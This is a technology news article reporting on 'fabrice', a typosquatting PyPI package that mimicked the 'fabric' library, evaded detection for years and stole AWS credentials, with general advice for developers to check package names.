Long-standing Malicious Python Package Lurked Undetected in PyPT for Years


November 10, 2024 by our News Team

A malicious Python package, "fabrice," has been discovered on PyPI, targeting login credentials and secret keys from Amazon Web Services and using clever evasion techniques to avoid detection, highlighting the need for caution and vigilance in the open-source community.

  • The malicious package was cleverly designed to mimic a legitimate package, making it difficult to detect.
  • The package had a significant download count, highlighting the potential impact of this security breach.
  • The incident serves as a reminder for developers to exercise caution and adopt best practices to protect their projects from potential threats.


A recent discovery on the Python Package Index (PyPI) has revealed a malicious Python package that has been lurking on the platform since 2021. This package, known as “fabrice,” was designed to steal sensitive data from projects where it was being imported. Specifically, it targeted login credentials and secret keys from Amazon Web Services, potentially affecting programmers who mistakenly added the package to their projects.

The clever trick behind this malicious package was its similarity to a legitimate package called “fabric,” which is widely used as a remote SSH server. While the official fabric package boasts over 200,000 downloads, its fraudulent counterpart has managed to accumulate around 37,000 downloads. This significant download count highlights the potential impact of this security breach.

According to security researchers at Socket, the package remained undetected for so long due to some clever evasion techniques. Initially, the package appeared harmless and contained no malicious content, making it difficult to flag during the submission process. However, it was later updated to include hidden malicious activities, making it harder to detect. Subsequent versions of the package incorporated code capable of downloading and executing malicious scripts, ultimately aiming to steal programmers’ access credentials.

To further complicate matters, the package adapted its behavior depending on the system it was executed on. It would download malware from external systems and execute it to steal the desired data. Once obtained, the stolen data would be sent back to remote systems and potentially used for attacks on AWS accounts. This dynamic behavior made it even more challenging to identify and mitigate the threat.

Given that the package exploited potential typos in its name, one crucial protective measure for users is to carefully review the names of all packages imported from PyPI. This trend of malicious packages capitalizing on naming errors is becoming increasingly prevalent within the PyPI ecosystem. Therefore, it is essential for developers to remain vigilant and double-check the packages they incorporate into their projects.

This recent incident serves as a reminder of the ongoing challenges faced by the open-source community in maintaining the security and integrity of software libraries. While PyPI continues to take steps to enhance its security measures, it is crucial for developers to exercise caution and adopt best practices to protect their projects from potential threats.

As the Python ecosystem continues to thrive and attract more developers, it is essential for the community to work together to ensure the safety of the tools and packages we rely on. By staying informed, remaining vigilant, and actively contributing to the security of the ecosystem, we can collectively mitigate the risks posed by malicious actors and safeguard the integrity of our projects.

About Our Team

Our team comprises industry insiders with extensive experience in computers, semiconductors, games, and consumer electronics. With decades of collective experience, we’re committed to delivering timely, accurate, and engaging news content to our readers.


Technology Explained


AWS: Amazon Web Services (AWS) is a cloud platform powered by Amazon that enables users to access cloud computing services, such as storage, data analytics, and distributed computing. It offers users the ability to utilize both on-demand and pay-as-you-go computing services, making it a great option for the computer industry. It offers a wide range of services with great flexibility for a variety of uses. It can help companies build powerful web and mobile applications, run large-scale analytics, quickly provision servers and other services, design sophisticated architectures for data storage, and more. AWS provides access to a wide range of services such as virtualization, storage, database, monitoring, analytics, and other services that can help organizations increase agility, manage complexity, and remain on the cutting edge of technology. Many big and famous organizations use AWS services to give them a competitive edge, and more and more companies are turning to this service for their computer needs.

Latest Articles about AWS




Leave a Reply